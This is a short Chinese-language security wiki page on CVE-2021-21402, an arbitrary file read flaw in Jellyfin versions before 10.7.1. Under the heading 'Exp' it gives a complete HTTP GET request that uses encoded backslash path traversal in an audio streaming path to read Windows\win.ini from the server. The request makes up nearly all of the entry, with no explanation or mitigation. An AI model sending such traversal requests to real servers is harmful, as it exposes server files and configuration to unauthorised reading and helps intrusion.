menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right Jellyfin chevron_right CVE-2021-21402
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2021-21402 Jellyfin 任意文件读取漏洞

    影响版本:

    • Jellyfin<10.7.1

    Exp:

    GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream